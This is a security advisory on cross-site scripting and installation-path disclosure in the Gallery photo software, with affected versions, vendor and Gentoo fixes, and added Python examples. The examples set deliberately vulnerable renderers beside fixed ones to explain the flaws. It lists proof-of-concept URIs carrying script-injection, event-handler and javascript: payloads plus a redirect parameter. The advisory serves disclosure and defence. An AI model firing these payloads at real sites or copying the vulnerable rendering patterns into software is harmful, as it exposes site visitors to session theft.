Gallery Multiple Remote Vulnerabilities
BID:12292
Info
| Bugtraq ID: | 12292 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jan 17 2005 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to "Rafel Ivgi, The-Insider" <[email protected]>. |
| Vulnerable: | Gallery 2.0 Alpha; Gallery 1.4.4-pl4; Gallery 1.4.4-pl3; Gallery 1.4.4-pl2; Gallery 1.4.3-pl2; Gallery 1.4.3-pl1 |
| Not Vulnerable: | Gallery 1.4.4-pl5 |
Discussion
Gallery is reported prone to multiple remote vulnerabilities. The following issues are reported:
Multiple cross-site scripting issues are reported in Gallery. They exist because user-supplied request parameters (the proof-of-concept URIs in the Exploit section use set_albumName, index, the slideshow_low.php slide_* parameters, searchstring and username) are not sufficiently sanitized before they are written into dynamically rendered HTML pages returned to the user. The payloads are of the form "><script>...</script> and " onclick="...", which indicates that the values are echoed inside double-quoted HTML attributes without the quote character being encoded.
These issues permit a remote attacker to craft a malicious URI that carries hostile HTML and script code. If a victim follows the link, the code is rendered in the victim's browser in the security context of the affected Web site, which may allow theft of cookie-based authentication credentials or other attacks against the victim's session.
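The following is an added example, not code from Gallery or from the advisory author, showing why the attribute-breakout payloads in the Exploit section work and what the corresponding fix looks like. The renderer stands in for a PHP page that echoes a raw request parameter into a hidden form field; that template, the parameter names and the two PoC URIs copied from this page are the only assumptions.

```python
"""Added example (not Gallery's code): why the '"><script>' and
'" onclick="' payloads in this advisory's PoC URIs work, and what the
fix looks like. The renderer below stands in for a PHP page that does
    <input type="hidden" name="index" value="<?php echo $_GET['index'] ?>">
with a raw request parameter; it is an assumption about the bug class,
not a copy of add_comment.php or search.php."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# PoC URIs taken from the Exploit section of this advisory.
POC_ADD_COMMENT = ('http://www.example.com/gallery/add_comment.php'
                   '?set_albumName=Eros&index=1"><script>alert()</script>')
POC_SEARCH = ('http://www.example.com/gallery/search.php'
              '?searchstring=%22%20onclick%3D"alert%28%29"')


def params_from(url):
    """Decode the query string the way the server sees it (one value per name)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in qs.items()}


def render_vulnerable(params):
    """Echo every parameter straight into a double-quoted attribute.

    A value containing '"' closes the attribute and '>' closes the tag,
    so the attacker controls the rest of the markup."""
    return '\n'.join(
        f'<input type="hidden" name="{name}" value="{value}">'
        for name, value in params.items())


def render_fixed(params):
    """Same template, but each value is HTML-encoded with quote=True,
    so '"', '<', '>' and '&' become entities and cannot break out."""
    return '\n'.join(
        f'<input type="hidden" name="{escape(name, quote=True)}" '
        f'value="{escape(value, quote=True)}">'
        for name, value in params.items())


def is_valid_index(value):
    """Allowlist check for numeric parameters such as index and slide_index:
    rejecting anything but digits removes the sink entirely."""
    return value.isdigit()


def reflected_unescaped(body, value):
    """Scanner-style check: the decoded parameter appears verbatim in the
    response, i.e. it was not encoded on the way out."""
    return value in body


if __name__ == '__main__':
    for url in (POC_ADD_COMMENT, POC_SEARCH):
        p = params_from(url)
        print('vulnerable:', render_vulnerable(p), sep='\n')
        print('fixed:', render_fixed(p), sep='\n')
```

Note that the search.php payload contains no angle brackets at all: a filter that only strips <script> would pass it, because the injection is an event handler attribute. Encoding the quote character (quote=True) is what closes that path, and for parameters that are supposed to be integers an allowlist check is the stronger fix.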
An information disclosure vulnerability is reported to affect Gallery version 2.0 Alpha. It is reported that under some circumstances Gallery may return an error message that contains the installation path of the vulnerable Gallery installation.
A remote attacker may exploit this vulnerability to disclose information about the layout of the filesystem on a vulnerable computer. Information harvested in this manner may then be used to aid in further attacks that are launched against a vulnerable computer.
Exploit / POC
The following examples are available:
Gallery v1.3.4-pl1:
http://www.example.com/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><script>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://www.example.com/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"
Gallery v1.4.4-pl2:
http://www.example.com/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*/%20onactivate%3Dalert%28%29%3e<plaintext>
http://www.example.com/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.google.com&cmd=
Gallery v2.0 Alpha:
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview
2) http://www.example.com/g2/main.php?g2_return=www.example.com%2Fg2%2Fmain.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb343da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&g2_view=core:UserAdmin&g2_subView=core:UserAdmin
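The Gallery 2.0 Alpha comment-preview PoC above is a different bug class from the 1.x attribute breakouts: the payload [img]javascript:alert()[/img] is well-formed markup whose URL has a dangerous scheme. The following added example (not Gallery 2 code; the BBCode subset, the function names and the constructed subject string are assumptions for illustration) shows why HTML-encoding alone does not stop it and what a scheme allowlist looks like.

```python
"""Added example (not Gallery 2 code): PoC 1) above places
[img]javascript:alert()[/img] in a comment subject. A markup renderer that
turns [img]...[/img] into <img src="..."> must allowlist the URL scheme;
HTML-encoding alone does not help, because 'javascript:alert()' contains no
character that encoding changes. The tag syntax and behaviour here are
assumptions for illustration, not Gallery's actual BBCode implementation."""
import re
from html import escape
from urllib.parse import urlsplit

IMG_TAG = re.compile(r'\[img\](.*?)\[/img\]', re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {'http', 'https'}


def safe_image_url(url):
    """Accept only absolute http(s) URLs.

    Whitespace is removed before parsing because browsers ignore tabs and
    newlines inside a scheme ('java\\nscript:' still runs), and
    protocol-relative '//host/x' is rejected because it has no scheme."""
    parts = urlsplit(''.join(url.split()))
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def _render(text, check_scheme):
    """Shared renderer: text outside tags is always HTML-encoded, tag bodies
    become <img> elements, optionally gated by safe_image_url()."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(text):
        out.append(escape(text[pos:m.start()], quote=True))
        url = m.group(1)
        if check_scheme and not safe_image_url(url):
            out.append(escape(m.group(0), quote=True))  # keep the tag as literal text
        else:
            out.append(f'<img src="{escape(url, quote=True)}">')
        pos = m.end()
    out.append(escape(text[pos:], quote=True))
    return ''.join(out)


def render_bbcode_vulnerable(text):
    """Encodes the URL but never checks its scheme: javascript: goes through."""
    return _render(text, check_scheme=False)


def render_bbcode_fixed(text):
    """Same, with the scheme allowlist applied before emitting <img>."""
    return _render(text, check_scheme=True)


if __name__ == '__main__':
    subject = 'test [img]javascript:alert()[/img]'   # constructed, from PoC 1)
    print(render_bbcode_vulnerable(subject))
    print(render_bbcode_fixed(subject))
```

The check is an allowlist (http and https with a host) rather than a denylist of javascript:, because scheme names are case-insensitive and browsers tolerate embedded tabs and newlines, so a string comparison against "javascript:" is easy to bypass. The stored case matters more than the reflected one here: a comment subject is rendered to every later visitor, not only to whoever follows a crafted link.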
Solution / Fix
Solution:
The vendor has released Gallery 1.4.4-pl5 to address these issues.
Gentoo has released advisory GLSA 200501-45 to address these issues. Gentoo users may carry out the following commands to update their computers:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/gallery-1.4.4_p6"
Note: Users with the vhosts USE flag set should manually use webapp-config to finalize the update.
For each of the affected 1.4.x releases (Gallery 1.4.3-pl1, Gallery 1.4.3-pl2, Gallery 1.4.4-pl2, Gallery 1.4.4-pl3 and Gallery 1.4.4-pl4) the fix is the same:
Gallery 1.4.4-pl5
http://sourceforge.net/project/showfiles.php?group_id=7130&package_id=7239&release_id=299701
References
References:
- Gallery Product Page (Gallery)
- Release Name: 1.4.4-pl5 (Gallery)
- Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability ("Rafel Ivgi, The-Insider")